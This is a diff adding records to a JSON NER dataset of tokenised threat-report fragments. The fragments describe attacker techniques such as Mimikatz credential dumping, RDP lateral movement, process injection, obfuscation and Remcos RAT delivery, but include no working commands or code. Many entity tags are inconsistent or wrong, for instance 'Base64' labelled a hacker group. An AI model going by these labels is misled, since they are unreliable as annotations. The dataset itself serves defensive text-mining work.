+ ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Encrypted", + "Multi-Hop", + "Proxies" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "cyber", + "actors", + "use", + "the", + "VPS", + "as", + "well", + "as", + "small", + "office", + "and", + "home", + "office", + "(SOHO)", + "devices", + "as", + "operational", + "nodes", + "to", + "evade", + "detection." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "have", + "been", + "routinely", + "observed", + "using", + "a", + "VPS", + "as", + "an", + "encrypted", + "proxy." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Some", + "of", + "these", + "nodes", + "operate", + "as", + "part", + "of", + "an", + "encrypted", + "proxy", + "service", + "to", + "prevent", + "attribution", + "by", + "concealing", + "their", + "country", + "of", + "origin", + "and", + "TTPs" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "cyber", + "actors", + "have", + "been", + "observed", + "using", + "a", + "network", + "of", + "VPSs", + "and", + "small", + "office", + "and", + "home", + "office", + "(SOHO)", + "routers", + "as", + "part", + "of", + "their", + "operational", + "infrastructure", + "to", + "evade", + "detection", + "and", + "host", + "C2", + "activity" + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "to", + "locate", + "certain", + "files,", + "paths," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "cyber", + "actors", + "have", + "been", + "observed", + "using", + "multiple", + "implants", + "with", + "file", + "system", + "enumeration", + "and", + "traversal", + "capabilities." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "IP", + "address", + "space" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "cyber", + "actors", + "have", + "exploited", + "known", + "vulnerabilities", + "in", + "Internet-facing", + "systems" + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "exploit", + "targeting", + "a", + "public-facing", + "appliance", + "vulnerability." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Exploiting", + "Internet", + "accessible", + "webservers", + "using", + "webshell", + "small", + "code", + "injections", + "against", + "multiple", + "code", + "languages,", + "including", + "net,", + "asp,", + "apsx,", + "php,", + "japx,", + "and", + "cfm." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "These", + "emails", + "may", + "contain", + "a", + "malicious", + "link", + "or", + "files", + "that", + "will", + "provide", + "the", + "cyber", + "actor", + "access", + "to", + "the", + "victim’s", + "device" + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "These", + "emails", + "may", + "contain", + "a", + "malicious", + "link", + "or", + "file", + "that", + "provide", + "the", + "cyber", + "actor", + "access", + "to", + "the", + "victim’s", + "device" + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "after", + "the", + "user", + "clicks", + "on", + "the", + "malicious", + "link", + "or", + "opens", + "the", + "attachment." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "the", + "user", + "clicks", + "on", + "the", + "malicious", + "link", + "or", + "opens", + "the", + "attachment." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "gaining", + "credential", + "access", + "into", + "victim", + "networks", + "by", + "using", + "legitimate,", + "but", + "compromised", + "credentials", + "to", + "access", + "OWA", + "servers,", + "corporate", + "login", + "portals,", + "and", + "victim", + "networks." + ], + "ner_tags": [ + "B-Purp", + "B-SamFile", + "B-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "cyber", + "actors", + "used", + "valid", + "accounts", + "to", + "log", + "into", + "a", + "service", + "specifically", + "designed", + "to", + "accept", + "remote", + "connections," + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "I-Tool", + "I-Tool", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "actor", + "may", + "then", + "perform", + "actions", + "as", + "the", + "logged-on", + "user." + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "cyber", + "actors", + "used", + "valid", + "accounts", + "to", + "log", + "into", + "a", + "service", + "specifically", + "designed", + "to", + "accept", + "remote", + "connections," + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "I-Tool", + "I-Tool", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "actor", + "may", + "then", + "perform", + "actions", + "as", + "the", + "logged-on", + "user." + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Using", + "cmd.exe," + ], + "ner_tags": [ + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Windows", + "Command", + "Shell" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "or", + "command", + "line", + "interface", + "tools" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "executing", + "malware", + "shellcode", + "and", + "batch", + "files" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Employing", + "Python", + "scripts", + "to", + "exploit", + "vulnerable", + "servers." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "cyber", + "actors", + "used", + "valid", + "accounts", + "to", + "log", + "into", + "a", + "service", + "specifically", + "designed", + "to", + "accept", + "remote", + "connections,", + "such", + "as", + "telnet,", + "SSH,", + "RDP,", + "and", + "Virtual", + "Network", + "Computing", + "(VNC)." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "B-Way", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "B-Way" + ] + }, + { + "tokens": [ + "cyber", + "actors", + "used", + "valid", + "accounts", + "to", + "log", + "into", + "a", + "service", + "specifically", + "designed", + "to", + "accept", + "remote", + "connections,", + "such", + "as", + "telnet,", + "SSH,", + "RDP,", + "and", + "Virtual", + "Network", + "Computing", + "(VNC)." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "B-Way", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "B-Way" + ] + }, + { + "tokens": [ + "such", + "as", + "schtask", + "or", + "crontab", + "to", + "create", + "and", + "schedule", + "tasks", + "that", + "enumerate", + "victim", + "devices", + "and", + "networks." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "to", + "establish", + "new", + "services", + "to", + "enable", + "persistence." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "cyber", + "actors", + "have", + "also", + "been", + "observed", + "modifying", + "group", + "policies", + "for", + "password", + "exploitation." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "B-Org", + "I-OffAct", + "I-OffAct", + "O", + "O", + "B-Exp" + ] + }, + { + "tokens": [ + "usage", + "of", + "Mimikatz" + ], + "ner_tags": [ + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "observed", + "targeting", + "the", + "LSASS", + "process", + "or", + "Active", + "directory", + "(NDST.DIT)", + "for", + "credential", + "dumping." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Injecting", + "into", + "the", + "rundll32.exe", + "process", + "to", + "hide", + "usage", + "of", + "Mimikatz,", + "as", + "well", + "as", + "injecting", + "into", + "a", + "running", + "legitimate", + "explorer.exe", + "process", + "for", + "lateral", + "movement." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Using", + "shellcode", + "that", + "injects", + "implants", + "into", + "newly", + "created", + "instances", + "of", + "the", + "Service", + "Host", + "process", + "(svchost)" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "were", + "observed", + "using", + "the", + "7-Zip", + "utility", + "to", + "unzip", + "imported", + "tools", + "and", + "malware", + "files", + "onto", + "the", + "victim", + "device." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "cyber", + "actors", + "have", + "been", + "observed", + "deleting", + "files", + "using", + "rm", + "or", + "del", + "commands." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "B-Org", + "B-OffAct", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "cyber", + "actors", + "were", + "observed", + "Base64", + "encoding", + "files", + "and", + "command", + "strings", + "to", + "evade", + "security", + "measures." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "have", + "been", + "observed", + "using", + "Base-64", + "encoded", + "commands" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "were", + "observed", + "using", + "Microsoft", + "signed", + "binaries,", + "such", + "as", + "Rundll32,", + "as", + "a", + "proxy", + "to", + "execute", + "malicious", + "payloads." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "have", + "been", + "observed", + "using", + "commands,", + "including", + "tasklist,", + "jobs,", + "ps,", + "or", + "taskmgr,", + "to", + "reveal", + "the", + "running", + "processes", + "on", + "victim", + "devices." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Features", + "O", + "B-Way", + "B-Tool", + "B-Tool", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "cyber", + "actors", + "also", + "used", + "on-premises", + "Identity", + "and", + "Access", + "Management", + "(IdAM)", + "and", + "federation", + "services", + "in", + "hybrid", + "cloud", + "environments", + "in", + "order", + "to", + "pivot", + "to", + "cloud", + "resources." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "B-Way", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "cyber", + "actors", + "also", + "used", + "on-premises", + "Identity", + "and", + "Access", + "Management", + "(IdAM)", + "and", + "federation", + "services", + "in", + "hybrid", + "cloud", + "environments", + "in", + "order", + "to", + "pivot", + "to", + "cloud", + "resources." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "B-Way", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "cyber", + "actors", + "used", + "RDP" + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "cyber", + "actors", + "have", + "been", + "observed", + "using", + "the", + "mv", + "command", + "to", + "export", + "files", + "into", + "a", + "location" + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "a", + "downloader", + "that", + "downloads", + "and", + "executes", + "a", + "payload" + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "B-Features", + "O", + "B-Features", + "I-Features", + "I-Features" + ] + }, + { + "tokens": [ + "cyber", + "actors", + "have", + "been", + "observed", + "importing", + "tools", + "from", + "GitHub", + "or", + "infected", + "domains", + "to", + "victim", + "networks" + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "B-Org", + "B-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "cyber", + "actors", + "used", + "the", + "Server", + "Message", + "Block", + "(SMB)", + "protocol", + "to", + "import", + "tools", + "into", + "victim", + "networks." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "it", + "also", + "tries", + "to", + "delete", + "the", + "wp-sale.js", + "file" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile" + ] + }, + { + "tokens": [ + "obfuscated", + "PHP", + "code", + "(again", + "using", + "character", + "code", + "obfuscation):" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "a", + "heavily", + "obfuscated", + "script" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "obfuscated", + "JavaScript", + "code" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "When", + "decoded" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "When", + "decoded,", + "a", + "backdoor", + "is", + "revealed" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "sent", + "as", + "a", + "POST", + "request" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "This", + "backdoor", + "executes", + "arbitrary", + "PHP", + "code", + "sent", + "in", + "POST", + "request", + "parameters." + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "actors", + "disable", + "antivirus", + "software" + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "threat", + "actor", + "deactivated", + "antivirus", + "protocols" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "after", + "receiving", + "phishing", + "emails", + "containing", + "malicious", + "PDF", + "documents", + "[T" + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "I-Tool", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "for", + "initial", + "access", + "is", + "RDP", + "compromise." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "actors", + "often", + "use", + "RDP", + "to", + "move", + "laterally", + "across", + "the", + "network" + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "download", + "multiple", + "tools" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "actors", + "gain", + "initial", + "access", + "through", + "exploiting", + "public-facing", + "applications" + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PsExec", + "has", + "also", + "been", + "used", + "to", + "aid", + "lateral", + "movement" + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features" + ] + }, + { + "tokens": [ + "actors", + "used", + "a", + "legitimate", + "admin", + "account", + "to", + "remotely", + "log", + "on", + "to", + "the", + "domain", + "controller" + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "by", + "modifying", + "Group", + "Policy", + "Objects" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "force", + "a", + "group", + "policy", + "update" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "delete", + "files", + "upon", + "completion—including" + ], + "ner_tags": [ + "B-SamFile", + "I-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "numerous", + "batch", + "(.bat)", + "files", + "on", + "impacted", + "systems" + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Batch", + "files", + "create", + "a", + "new", + "admin", + "user" + ], + "ner_tags": [ + "B-SamFile", + "I-SamFile", + "I-Features", + "I-Features", + "O", + "B-HackOrg", + "B-Features" + ] + }, + { + "tokens": [ + "which", + "are", + "typically", + "transferred", + "as", + "an", + "encrypted", + "7zip", + "file." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "These", + "strings", + "are", + "passed", + "to", + "a", + "decoding", + "function", + "where", + "they", + "are", + "converted", + "from", + "hex", + "to", + "byte", + "and", + "XOR’d", + "with", + "decimal", + "18." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "decoded", + "strings" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Once", + "decoded" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "Base64", + "decodes", + "the", + "payload", + "content" + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "to", + "decode", + "the", + "second", + "buffer", + "using", + "key", + "58", + "3E", + "88", + "D0" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "decoded", + "by", + "Shellcode" + ], + "ner_tags": [ + "O", + "O", + "B-SecTeam" + ] + }, + { + "tokens": [ + "These", + "strings", + "are", + "passed", + "to", + "a", + "de-obfuscation", + "function" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PowerShell", + "de-obfuscation", + "routine" + ], + "ner_tags": [ + "B-Way", + "B-SecTeam", + "O" + ] + }, + { + "tokens": [ + "this", + "shellcode", + "is", + "responsible", + "for", + "fetching", + "Remcos", + "RAT" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "used", + "to", + "retrieve", + "a", + "payload", + "package", + "containing", + "the", + "second", + "stage", + "PowerShell", + "and", + "two", + "shellcode", + "buffers" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "retrieves", + "a", + "decoy", + "tax", + "document", + "and", + "VBS", + "script." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "copying", + "the", + "current", + "process", + "command", + "line", + "as", + "a", + "new", + "argument" + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "full", + "command", + "line", + "argument" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "a", + "single", + "payload", + "package", + "is", + "retrieved", + "that", + "contains", + "both", + "the", + "two-stage", + "shellcode" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "highly", + "obfuscated", + "commands", + "and", + "encrypted", + "shellcode." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "PowerShell", + "command", + "contains", + "various", + "obfuscated", + "strings" + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "inject", + "Remcos", + "RAT", + "into", + "a", + "legitimate", + "Windows", + "process", + "such", + "as", + "ieinstal.exe." + ], + "ner_tags": [ + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "injecting", + "it", + "into", + "ieinstall.exe" + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "execution", + "begins", + "with", + "the", + "user", + "clicking", + "on", + "a", + "shortcut", + "file" + ], + "ner_tags": [ + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "executed", + "by", + "the", + "user", + "clicking", + "a", + "shortcut", + "file" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "enticing", + "users", + "to", + "click", + "on", + "malicious", + "shortcut", + "files" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "checks", + "if", + "the", + "system", + "is", + "64-bit" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "remote", + "access", + "and", + "surveillance", + "features" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "keylogging" + ], + "ner_tags": [ + "O" + ] + }, + { + "tokens": [ + "screenshots" + ], + "ner_tags": [ + "O" + ] + }, + { + "tokens": [ + "highly", + "obfuscated", + "and", + "contains", + "junk", + "code", + "to", + "impede", + "analysis." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "script", + "concatenates", + "hundreds", + "of", + "smaller", + "strings", + "into", + "a", + "single", + "variable", + "which", + "ultimately", + "builds", + "and", + "executes" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "payload", + "would", + "then", + "be", + "decrypted", + "through", + "XOR" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "use", + "a", + "set", + "of", + "tools", + "via", + "remote", + "desktop" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "ransomware", + "drops", + "a", + "batch", + "file" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "to", + "steal", + "system", + "information", + "like", + "machine", + "details" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "payload", + "most", + "likely", + "arrives", + "by", + "exploiting", + "public-facing", + "websites", + "and", + "domains." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "targeted", + "vulnerabilities", + "in", + "Microsoft", + "SQL", + "(MS", + "SQL)", + "Server", + "for", + "initial", + "access" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "payload", + "downloaded", + "by", + "the", + "PowerShell", + "script", + "was", + "a", + ".NET", + "downloader,", + "which", + "would", + "subsequently", + "retrieve", + "an", + "encrypted", + "payload", + "from", + "the", + "command-and-control", + "(C&C)", + "server" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "used", + "different", + "sets", + "of", + "defense", + "evasion", + "and", + "reconnaissance", + "tools", + "such", + "as", + "GMER", + "and", + "Advance", + "Process", + "Termination", + "to", + "manually", + "uninstall", + "antivirus", + "products", + "on", + "the", + "target", + "system." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "to", + "terminate", + "security-related", + "processes", + "and", + "services", + "by", + "dropping", + "KILLAV" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "the", + "threat", + "actors", + "who", + "perform", + "brute-force", + "attacks", + "on", + "MS", + "SQL", + "Servers." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Org", + "B-OffAct", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "executed", + "a", + "spam", + "campaign", + "with", + "malicious", + "OneNote", + "file", + "attachments," + ], + "ner_tags": [ + "O", + "O", + "B-Org", + "B-OffAct", + "O", + "O", + "B-SamFile", + "I-SamFile", + "O" + ] + }, + { + "tokens": [ + "The", + "initial", + "attack", + "phase", + "involves", + "infiltrating", + "Internet-facing", + "Microsoft", + "Exchange", + "servers" + ], + "ner_tags": [ + "O", + "O", + "B-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "malware", + "implemented", + "a", + "series", + "of", + "Mimikatz", + "modifications", + "on", + "closed-source", + "tooling" + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "staging", + "a", + "credential", + "theft", + "capability", + "in", + "the", + "LSASS", + "process", + "itself", + "by", + "abusing", + "native", + "Windows", + "capabilities" + ], + "ner_tags": [ + "O", + "O", + "B-SamFile", + "B-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "In", + "order", + "to", + "steal", + "credentials,", + "the", + "attackers", + "employ", + "custom", + "modified", + "versions", + "of", + "Mimikatz" + ], + "ner_tags": [ + "O", + "O", + "O", + "I-Purp", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "stealing", + "credentials", + "from", + "the", + "Local", + "Security", + "Authority", + "Subsystem", + "Service", + "(LSASS)", + "process." + ], + "ner_tags": [ + "B-Way", + "B-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Mimikatz", + "publicly", + "available", + "code", + "(top);", + "strings", + "from", + "a", + "Mimikatz", + "modification" + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "This", + "call", + "instructs", + "LSASS", + "to", + "load", + "and", + "execute", + "pc.dll,", + "which", + "then", + "stages", + 